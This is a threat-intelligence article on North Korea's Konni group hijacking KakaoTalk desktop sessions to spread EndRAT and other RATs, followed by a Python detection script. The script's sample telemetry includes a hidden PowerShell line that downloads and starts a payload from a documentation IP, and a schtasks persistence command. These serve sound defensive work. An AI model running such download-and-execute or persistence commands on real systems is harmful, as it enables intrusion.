PROBABLYPWNED
Threat Intelligence · March 17, 2026 · 3 min read

Konni APT Hijacks KakaoTalk to Spread EndRAT Across Contacts

North Korean threat group Konni weaponizes KakaoTalk messaging app after compromising victims via spear-phishing. EndRAT, RftRAT deployed in multi-stage campaign.

Alex Kowalski

North Korean threat group Konni is abusing the KakaoTalk desktop client to spread malware through victims' trusted contacts, according to new research from South Korean threat intelligence firm Genians. The campaign marks a shift in tactics: rather than relying on a fresh phishing email for each target, the attackers use each compromised victim's social graph to reach the next set of targets.

The operation begins with spear-phishing emails disguised as invitations to serve as North Korean human rights lecturers. Once a victim's machine is compromised, Konni hijacks their KakaoTalk session to send malicious archives to selected contacts, transforming each victim into an unwitting distribution node.

How the Attack Chain Works

Initial access comes through a ZIP attachment containing a Windows shortcut (LNK) file. When the victim opens the shortcut, the command line embedded in the LNK downloads a payload from an external server and establishes persistence via a scheduled task. A decoy PDF opens at the same time to distract the victim while installation completes.

The campaign deploys three separate remote access tools in AutoIt-based wrappers disguised as document files:

  1. EndRAT - A relatively simple RAT providing file management, remote shell access, data transfer, and persistence capabilities
  2. RftRAT - Used for additional command-and-control functionality
  3. RemcosRAT - A commercially available RAT frequently abused by threat actors

What sets this campaign apart is what happens after initial compromise. The attackers access the victim's KakaoTalk desktop client, South Korea's dominant messaging platform with roughly 53 million monthly users, and selectively message contacts from the victim's friend list. These messages carry additional malicious archives with the same LNK-based loader, so each victim becomes a distribution node for the next round. Because the operators choose which contacts receive the archive rather than blasting every contact automatically, this is operator-driven propagation through trusted relationships rather than a self-spreading worm.

Attribution and Infrastructure

Genians attributes this activity to Konni, a group that overlaps with other North Korea-linked operations including Kimsuky and APT37. The group has historically focused on South Korean government and diplomatic targets, though recent campaigns have expanded to blockchain developers and cryptocurrency projects, as we previously covered.

Command-and-control servers for this operation trace to Finland, Japan, and the Netherlands, likely a deliberate effort to spread infrastructure across multiple jurisdictions and complicate takedown efforts.

Why This Matters

The KakaoTalk abuse represents an evolution in social engineering. Rather than crafting convincing phishing emails for each target, Konni can now reach new victims through messages from accounts they already trust. A file sent by a colleague or acquaintance faces far less scrutiny than one from an unknown sender.

This technique also provides built-in context. If a victim works in human rights or academic circles—Konni's traditional target set—their contacts likely share similar interests. The attackers can reuse the same lures without modification because the social graph does the targeting for them.

Organizations with exposure to South Korean operations should consider implementing phishing awareness training that explicitly addresses compromised trusted contacts. Standard advice about suspicious senders doesn't apply when the sender is someone the recipient knows and regularly communicates with.

Indicators to Watch

The campaign uses scheduled tasks for persistence and reaches out to hardcoded C2 infrastructure. Security teams should monitor for:

  • Unusual KakaoTalk desktop client behavior, in particular one account sending archive attachments to many contacts in a short window, which is the propagation step rather than normal chat
  • LNK files triggering PowerShell or cmd.exe execution, typically visible as explorer.exe spawning a script host whose command line fetches a remote file
  • AutoIt-compiled executables disguising themselves as documents (document-style names and icons on a PE, scheduled tasks pointing into user-writable directories)
  • Outbound connections from script hosts or newly dropped executables to infrastructure not previously seen in your environment; the Finland, Japan, and Netherlands hosting observed here is a useful pivot for this campaign, but geography alone is a weak signal because the operators can move infrastructure at will
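As an added example (not Genians' tooling or the attackers' code) covering both the attack chain described above and the indicators in this list, the triage rules below run over constructed Sysmon-style process-creation events and file samples. The field names (EventID, ParentImage, Image, CommandLine) and the sample values, including the 203.0.113.7 address and the file names, are assumptions made for the example; the AutoIt container marker check assumes a stock, unpacked AutoIt build.

```python
"""Triage heuristics for an LNK -> script host -> scheduled task -> AutoIt RAT chain.

Added example, not code from the report or the campaign. Event keys follow a
Sysmon-like JSON export (Event ID 1 = process creation); adjust to your schema.
"""
import re

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments that fetch or decode a remote payload.
DOWNLOAD_HINTS = re.compile(
    r"(https?://|downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|"
    r"certutil|bitsadmin|-w(indowstyle)? hidden|-enc)",
    re.IGNORECASE,
)
# Directories a standard user can write to; a task action living here is worth a look.
USER_WRITABLE = re.compile(r"\\(appdata|temp|tmp|downloads|public|programdata)\\", re.IGNORECASE)
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".hwp", ".hwpx", ".xls", ".xlsx", ".ppt", ".pptx")
AUTOIT_MAGIC = b"AU3!EA06"  # marker the AutoIt compiler embeds (assumption: unpacked build)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def lnk_spawned_downloader(event):
    """Rule 1: a double-clicked LNK runs under explorer.exe, so explorer spawning a
    script host whose command line fetches something is the loader's trace."""
    if event.get("EventID") != 1:
        return False
    return (
        _basename(event.get("ParentImage", "")) == "explorer.exe"
        and _basename(event.get("Image", "")) in SCRIPT_HOSTS
        and bool(DOWNLOAD_HINTS.search(event.get("CommandLine", "")))
    )


def task_persists_user_writable_binary(event):
    """Rule 2: schtasks /create whose command line references a user-writable
    directory. Installers register tasks too, so this is a triage signal, not a verdict."""
    if event.get("EventID") != 1 or _basename(event.get("Image", "")) != "schtasks.exe":
        return False
    cmd = event.get("CommandLine", "")
    return "/create" in cmd.lower() and bool(USER_WRITABLE.search(cmd))


def decoy_named_executable(filename, head):
    """Rule 3: a PE carrying a document-style name (often padded with spaces to
    hide the real extension) or the AutoIt script container marker."""
    reasons = []
    stem, _, ext = _basename(filename).rpartition(".")
    if ext in ("exe", "scr", "com") and stem.rstrip().endswith(DOC_EXTENSIONS):
        reasons.append("document double extension")
    if head[:2] == b"MZ" and AUTOIT_MAGIC in head:
        reasons.append("autoit compiled script")
    return reasons


def triage(events, files):
    """Return (rule, identifier) pairs for everything the three rules flag."""
    hits = []
    for ev in events:
        if lnk_spawned_downloader(ev):
            hits.append(("lnk_downloader", ev["ProcessId"]))
        if task_persists_user_writable_binary(ev):
            hits.append(("task_user_writable", ev["ProcessId"]))
    for name, head in files:
        for why in decoy_named_executable(name, head):
            hits.append((why, name))
    return hits


# Constructed sample telemetry; none of it comes from the Genians report.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c powershell -w hidden -c "iwr http://203.0.113.7/s1 -OutFile %TEMP%\s1.exe; start %TEMP%\s1.exe"'},
    {"EventID": 1, "ProcessId": 4131, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks.exe /create /sc minute /mo 10 /tn OneDriveSync /tr C:\Users\kim\AppData\Local\Temp\s1.exe /f"},
    {"EventID": 1, "ProcessId": 4140, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},  # benign: user opened a prompt
    {"EventID": 1, "ProcessId": 4150, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks.exe /create /tn Office /tr C:\Program Files\Office\update.exe"},  # benign path
]
SAMPLE_FILES = [
    ("invitation_lecture.pdf                 .exe", b"MZ" + b"\x00" * 64 + AUTOIT_MAGIC + b"\x00" * 16),
    ("invitation_lecture.pdf", b"%PDF-1.7 decoy"),
    ("tool.exe", b"MZ" + b"\x00" * 80),
]

if __name__ == "__main__":
    for rule, ident in triage(SAMPLE_EVENTS, SAMPLE_FILES):
        print(f"{rule:28s} {ident}")
```

The rules are intentionally narrow so they can be dropped into a SIEM as a starting point: the first two key on process lineage and command-line content rather than on the C2 addresses, which the operators can rotate, and the third gives you something to run over the archives pulled out of KakaoTalk conversations. Expect to tune the user-writable path list and the benign-parent exclusions against your own baseline before alerting on them.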

The attackers' willingness to burn compromised accounts for distribution suggests they prioritize scale over stealth in later attack stages. Rapid detection of anomalous messaging patterns could disrupt the propagation chain before it spreads further.
